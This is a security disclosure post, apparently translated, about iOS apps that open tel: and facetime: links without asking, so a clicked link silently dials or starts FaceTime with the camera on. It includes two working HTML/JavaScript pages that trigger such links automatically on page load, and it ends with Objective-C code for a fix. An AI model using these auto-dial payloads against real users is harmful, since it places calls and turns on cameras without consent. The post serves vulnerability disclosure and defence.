Ano_Tom · 2014/08/27 16:41

0x00 Background

A foreign security researcher discovered a flaw in some iOS apps (successfully tested with Google+, Facebook Messenger, and Gmail): when a user clicks a link, the app automatically places a phone call or opens FaceTime, turning on the front-facing camera, without any warning. The bug exists because developers did not read the official developer documentation for Phone Links and FaceTime Links, which states that "iOS does not display a notification window when users open this type of link in a native app".

0x01 Defect Description

According to Apple's official documentation, there are roughly the following types of URL schemes:

1) Mail Links

When a link of this type is clicked, the Mail application is invoked automatically; a mailto URL must specify a recipient address.

The string format of the link in a web page is as follows:

<a href="mailto:[email protected]">John Frank</a>

The format of the URL string in a native application is:

mailto:[email protected]

You can also add a subject and body to the string, for example:

mailto:[email protected][email protected]&subject=Greetings%20from%20Cupertino!&body=Wish%20you%20were%20here!

See the RFC documentation for the mailto format…

2) Phone Links

A tel URL is used to launch the Phone application on an iOS device and dial the specified number. When a user clicks a link of this type in a web page, the iOS device shows an alert asking whether to dial the number, and the call begins only if the user agrees. But when a user opens this type of link inside a native app, iOS shows no alert and calls the specified number directly. Native applications can, of course, be configured to show the prompt or not.

For example, embed an A tag in a web page with the following content:

<a href="tel:10086">fuck it</a>

Then visit the page and click the "fuck it" link: a prompt asking whether to place the call pops up automatically, as shown in Figure 1.

The official documentation also gives the form of the URL in a native app. The URL string in a native app is tel:1-408-555-5555

Type tel://10086 in the Messages (SMS) app and tap it, and it prompts you to make a call, as shown in Figure 2.

At the same time, to prevent malicious requests, the system will not dial a number if the link contains the * or # characters. In addition, phone number detection on iOS is enabled by default; to prevent numbers on a web page from being recognised as phone numbers, add the following tag to the page:

<meta name="format-detection" content="telephone=no">

For the exact URL scheme, refer to the RFC documents…

3) FaceTime Links (FaceTime enabled, front-facing camera enabled)

A facetime URL is used to make the FaceTime application call a specified user, identified either by phone number or by an email address bound to the account. When a user clicks a FaceTime URL in a web page, the system asks whether to dial. But when this type of URL is clicked inside a native app, iOS opens the FaceTime app and places the call directly, without any prompt. Native applications can be configured to show the prompt. Links in web pages are formatted as:

<a href="facetime:14085551234">Connect using FaceTime</a>
<a href="facetime:[email protected]">Connect using FaceTime</a>

The URL string in a native application is:

facetime://14085551234
facetime:[email protected]

As with tel links, to prevent malicious requests the system will not dial the number if the link contains the * or # characters. Before iOS 7, using this scheme placed a call through the regular Phone app instead of the FaceTime app.

4) SMS Links

The sms scheme is used to open the Messages application. The URL format is sms:<number>, where the target user's number may contain only the digits 0 to 9 and the three characters +, - and .; the URL string may not contain any other text.

Links in web pages are formatted as:

<a href="sms:">Launch Messages App</a>
<a href="sms:1-408-555-1212">New SMS Message</a>

The URL string in a native application is:

5) Other types of Links

Others, such as Map Links (open Maps), iTunes Links (open iTunes) and YouTube Links (open YouTube), are not covered one by one here: clicking the corresponding link opens the Maps, iTunes, etc. app. See Apple's official developer documentation for details.

As the introduction above shows, Phone Links and FaceTime Links can be abused: if such a link is opened inside a native application, clicking it invokes the relevant application directly, without any warning.

If you type tel://XXXX or facetime://XXXX into the application, the corresponding dialing application is invoked directly. Likewise, we can post a web link inside the application, embed such an A tag in that web page, and use JavaScript to click the A tag automatically when the page loads.

So the specific test code is as follows, save it as an HTML file.

<a id="target" href="facetime:[email protected]">click me</a>
<script type="text/javascript">
var target = document.getElementById("target");
// build a synthetic click event and deliver it to the link on page load
var fakeEvent = document.createEvent("MouseEvents");
fakeEvent.initEvent("click", true, false);
target.dispatchEvent(fakeEvent);
</script>

Or the following:

<html>
<head>
<title>v</title>
</head>
<body>
<a id="dial" href="tel:10086">fuck it</a>
<script type="text/javascript">
<!--
// navigate to the link's href as soon as the page has loaded
window.onload = function() {
    window.location.href = document.getElementById("dial").href;
};
//-->
</script>
</body>
</html>

tel:XXXXX is the number to call. When the link is clicked, the number is dialed automatically.

facetime:XXXXX is the FaceTime account to call. After the link is clicked, the camera opens automatically without any prompt.

Note: the second snippet failed in some applications where the first one succeeded.

0x02 Case Test

We have tested several common chat applications in China and found that the defect exists in most of them. We have reported it to the vendors, and it may take some time before it is fixed. Below is the e-Trust case submitted on Cloud Cloud (a new version will be released officially). The tested versions are iOS 6.1.4 and e-Trust V2.9.0.1680.

Post the URL in Moments, as shown in Figure 3.

After a friend clicks it, their phone automatically places a call or starts FaceTime, as shown in Figures 2 and 3.

0x03 How to Fix It

As described in Apple's official developer documentation, a native app can configure whether a prompt is shown when it opens such a URL. So it is likely that developers did not fully understand Apple's URL scheme specification and introduced the problem inadvertently. The exact fix is not clear to me because I have little exposure to iOS development. 🙂
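One way a native app can restore the prompt that Safari shows, as an added example that is not from the original post or from any of the tested apps: intercept tel: and facetime: navigations in the web view's delegate and ask the user before handing the URL to the system. The class name, property name and the set of schemes are assumptions; the delegate and alert APIs are those of UIKit at the time of the post.

```objective-c
// Added example (not from the original post): a UIWebView delegate that
// blocks tel:/facetime: navigations and asks the user first. Script-driven
// clicks and window.location assignments also arrive here, so the
// navigationType is not trusted as proof of a real tap.
#import <UIKit/UIKit.h>

@interface SafeLinkViewController : UIViewController <UIWebViewDelegate, UIAlertViewDelegate>
@property (nonatomic, strong) NSURL *pendingCallURL; // URL awaiting user consent (assumed name)
@end

@implementation SafeLinkViewController

// Schemes that place a call (or open the camera) with no system prompt
// when opened from a native app, per the Apple documentation quoted above.
+ (NSSet *)callSchemes {
    return [NSSet setWithObjects:@"tel", @"facetime", nil];
}

- (BOOL)webView:(UIWebView *)webView
    shouldStartLoadWithRequest:(NSURLRequest *)request
    navigationType:(UIWebViewNavigationType)navigationType {
    NSString *scheme = [[request.URL scheme] lowercaseString];
    if (![[[self class] callSchemes] containsObject:scheme]) {
        return YES; // http(s) and other content: let the web view load it
    }
    // Stop the navigation and ask; the call is only placed from the alert callback.
    self.pendingCallURL = request.URL;
    UIAlertView *alert = [[UIAlertView alloc]
        initWithTitle:@"Place this call?"
              message:[request.URL absoluteString]
             delegate:self
    cancelButtonTitle:@"Cancel"
    otherButtonTitles:@"Call", nil];
    [alert show];
    return NO;
}

- (void)alertView:(UIAlertView *)alertView clickedButtonAtIndex:(NSInteger)buttonIndex {
    NSURL *url = self.pendingCallURL;
    self.pendingCallURL = nil;
    if (url == nil || buttonIndex == alertView.cancelButtonIndex) {
        return; // user declined, or nothing pending
    }
    [[UIApplication sharedApplication] openURL:url]; // consented: hand off to Phone/FaceTime
}

@end
```

The same check belongs anywhere the app forwards a URL it did not construct itself, for example when it turns text typed into a chat message into a tappable link.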

Reference: algorithm.dk/posts/RTFM-…